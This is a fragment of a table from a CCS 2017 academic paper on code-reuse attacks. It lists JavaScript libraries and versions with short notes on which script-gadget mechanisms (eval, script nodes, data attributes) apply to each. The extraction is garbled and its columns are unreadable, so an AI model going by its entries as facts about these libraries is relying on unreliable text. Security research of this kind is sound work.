jQuery
Mobile 1.4.5
- -
Ember.js
2.10.2
- -
React -
Closure - (<a.*)
Ractive
0.8.1
- ({{}} uses eval) - (<script) - (script node) - (script) - (script) - (script)
Dojo 1.12.2 - (data-)
Requirejs
2.3.2
- (<script)
jQuery 3.1.1 - - - (<script)
jQuery UI
1.12.1
- -
Bootstrap
3.3.7
- (HTML in HTML
attr)
Session H2: Code Reuse Attacks
CCS’17, October 30-November 3, 2017, Dallas, TX, USA
1723